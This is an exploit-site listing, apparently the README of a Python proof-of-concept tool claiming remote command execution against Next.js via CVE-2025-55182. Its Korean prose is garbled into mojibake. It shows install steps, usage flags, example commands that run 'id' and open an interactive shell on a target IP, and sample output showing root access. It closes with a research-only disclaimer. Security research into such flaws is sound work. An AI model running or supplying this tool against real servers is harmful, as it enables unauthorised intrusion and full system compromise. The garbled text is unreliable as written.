Share
## https://sploitus.com/exploit?id=37AAE70B-D039-5A46-BBF3-C3A86661335B
# CVE-2025-55182 Next.js Exploit Tool
μ΄ λꡬλ Next.jsμ μ·¨μ½μ (CVE-2025-55182)μ μ΄μ©νμ¬ μ격 λͺ
λ Ή μ€ν(RCE)μ μννλ PoC(Proof of Concept) μ€ν¬λ¦½νΈμ
λλ€.
λμ μλ²μ μ·¨μ½μ μ νμΈνκ³ , λ¨μΌ λͺ
λ Ήμ΄ μ€ν λλ λνν μ λͺ¨λλ₯Ό μ§μν©λλ€.
## μ£Όμ κΈ°λ₯
- **λ¨μΌ λͺ
λ Ήμ΄ μ€ν**: ν λ²μ λͺ
λ Ήμ΄λ₯Ό μ μ‘νκ³ κ²°κ³Όλ₯Ό νμΈν©λλ€.
- **λνν μ (Interactive Shell)**: λ§μΉ ν°λ―Έλμ μ μν κ²μ²λΌ μ°μμ μΌλ‘ λͺ
λ Ήμ΄λ₯Ό μ€νν μ μμ΅λλ€.
- **κ²°κ³Ό νμ±**: Next.jsμ 볡μ‘ν μλ¬ μλ΅μμ λͺ
λ Ήμ΄ μ€ν κ²°κ³Όλ§ κΉλνκ² μΆμΆνμ¬ λ³΄μ¬μ€λλ€.
- **νλ‘μ μ§μ**: Burp Suite λ±μ ν΅ν λΆμμ μν΄ HTTP νλ‘μ μ€μ μ μ§μν©λλ€.
## μ€μΉ λ° μ¬μ μ€λΉ
μ΄ μ€ν¬λ¦½νΈλ Python 3λ‘ μμ±λμμΌλ©°, λ€μ λΌμ΄λΈλ¬λ¦¬κ° νμν©λλ€.
```bash
pip install requests rich
```
* `rich`: μ»¬λ¬ μΆλ ₯ λ° λνν ν둬ννΈλ₯Ό μν΄ μ¬μ©λ©λλ€. (μ€μΉλμ΄ μμ§ μμλ κΈ°λ³Έ κΈ°λ₯μ μλν©λλ€.)
## μ¬μ© λ°©λ²
```bash
python poc.py -u [μ΅μ
]
```
### νμ μ΅μ
- `-u`, `--url`: λμ Next.js μλ²μ URL (μ: `http://192.168.10.92:3000`)
### μ€ν λͺ¨λ (λ μ€ νλ νμ)
- `-c `, `--cmd `: μ€νν λ¨μΌ λͺ
λ Ήμ΄ μ§μ
- `--shell`: λνν μ λͺ¨λλ‘ μ§μ
### μΆκ° μ΅μ
- `-v`, `--verbose`: μμΈ μΆλ ₯ λͺ¨λ (μ μ‘λλ νμ΄λ‘λλ μ 체 μλ΅ νμΈ μ μ μ©)
- `-p `, `--proxy `: νλ‘μ μλ² μ€μ (μ: `http://127.0.0.1:8080`)
## μ¬μ© μμ
### 1. λ¨μΌ λͺ
λ Ήμ΄ μ€ν (`id` νμΈ)
```bash
python poc.py -u http://192.168.10.92:3000 -c "id"
```
### 2. λνν μ μ€ν
```bash
python poc.py -u http://192.168.10.92:3000 --shell
```
**μ€ν νλ©΄:**
```text
[+] λμ URL: http://192.168.10.92:3000
[*] λνν μ λͺ¨λ μμ ('exit' λλ 'quit'μΌλ‘ μ’
λ£)
Shell> whoami
root
Shell> ls -la
total 64
drwxr-xr-x 1 node node 4096 Dec 8 06:12 .
...
```
### 3. νλ‘μλ₯Ό ν΅ν νΈλν½ νμΈ
```bash
python poc.py -u http://192.168.10.92:3000 --shell -p http://127.0.0.1:8080
```
## μ£Όμμ¬ν
- μ΄ λꡬλ **보μ μ°κ΅¬ λ° κ΅μ‘ λͺ©μ μΌλ‘λ§ μ¬μ©**ν΄μΌ ν©λλ€.
- νκ°λ°μ§ μμ μμ€ν
μ λν ν
μ€νΈλ λΆλ²μ΄λ©°, μ΄μ λ°λ₯Έ λͺ¨λ μ±
μμ μ¬μ©μμκ² μμ΅λλ€.